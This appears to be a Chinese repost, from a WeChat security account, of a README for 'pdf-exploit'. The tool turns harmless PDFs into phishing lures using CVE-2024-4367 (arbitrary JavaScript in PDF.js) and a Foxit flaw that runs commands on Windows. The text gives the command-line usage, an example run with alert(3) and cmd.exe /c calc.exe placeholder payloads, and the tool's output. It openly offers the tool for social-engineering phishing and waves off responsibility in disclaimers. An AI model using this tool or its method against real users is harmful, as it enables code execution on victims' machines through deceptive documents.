项目介绍
集成近期的一些pdf解析器的漏洞,制作PDF文档,用户可以通过改脚本来构造钓鱼文档进行社工钓鱼操作
使用方法
➜ pdf-exploit ./pdf.py --helpusage: pdf-exploit [-h] -f F [-p P] -o O [-pdfjs PDFJS] [-foxit-exec FOXIT_EXEC] [-foxit-args FOXIT_ARGS]options:-h, --help show this help message and exit-f F the harmless pdf path-p P password-o O the new pdf filepdfjs:CVE-2024-4367-pdfjs PDFJS javascript to be executed, example: alert(3)foxit:foxit pdf 'flawed design' explotation-foxit-exec FOXIT_EXEC-foxit-args FOXIT_ARGS
使用示例如下:
➜ pdf-exploit ./pdf.py -f ~/Downloads/data.pdf -o /tmp/data.pdf -pdfjs 'alert(3)' -foxit-exec cmd.exe -foxit-args "/c calc.exe"[] use the PDF.JS exploit: alert(3)[] make a text pdf[] make evil font[] fd ref: 9[] add font object to pdf: 10[] set font: /F1[] use the foxit exploit: cmd.exe /c calc.exeset OpenAction to Catalog done[] store to /tmp/data.pdf
漏洞集成
目前支持:
- CVE-2024-4367: PDF.js 解析 pdf 时存在缺陷,可以执行任意的 javascript 脚本。
- Foxit PDF机制缺陷:windows平台下可以执行远程命令(有弹窗提醒)
免责声明
由于传播、利用此工具提供的功能而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本人不为此承担任何责任
下载地址
原文始发于微信公众号(七芒星实验室):社工钓鱼利器:CVE-2024-4367: PDF.js
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论